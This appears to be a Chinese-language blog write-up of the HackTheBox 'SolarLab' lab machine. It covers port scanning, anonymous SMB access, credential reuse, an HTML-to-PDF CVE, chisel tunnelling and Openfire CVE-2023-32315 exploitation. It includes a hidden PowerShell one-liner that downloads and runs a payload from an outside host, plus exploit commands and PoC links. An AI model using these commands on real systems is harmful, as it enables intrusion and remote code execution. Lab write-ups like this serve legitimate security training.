HTB SolarLab Writeup
Recon:
1 | rustscan -a 10.10.11.16 --range 1-65535 |
1 | nmap 10.10.11.16 -p 53,80,135,139,445,6791 -sC -sV |
GetShell:
445开启了匿名访问:
1 | smbmap -H solarlab.htb -u guest |
里边有一些文档:
details-file中有密码串:
SMB认证似乎有问题:
将密码串适用于6791,blake.byte用户凭证可以正常登录,真实用户名为blakeb,在web服务页面中有四个模块,但都是输入html信息转化成pdf:
谷歌搜索会有一个名字相似,漏洞情形也相似的CVE,该漏洞是HTML转化PDF时产生的:
构造数据包发送:
收到shell:
嫌麻烦Powershell上CobaltStrike了,怕反弹shell无意识的关掉,或者异常断开,记得及时注入或迁移到其他进程。目标本地开放了很多端口,都属于同一个进程:
上传chisel进行端口转发:
9090打开为一个web页面:

搜索openfire 4.7.4,可以找到一个漏洞:
1 | https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT |
使用漏洞:
1 | python CVE-2023-32315.py -u http://127.0.0.1:9090 |
要上传的RCE插件可以在其他POC中找到:
1 | https://github.com/miko550/CVE-2023-32315 |
执行命令:
反弹shell:
1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.14:80/a'))" |
在C:\Program Files\Openfire\embedded-db\openfire.script下有一串administrator的hash:
使用工具破解:
1 | https://github.com/c0rdis/openfire_decrypt?tab=readme-ov-file |
获取root:
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments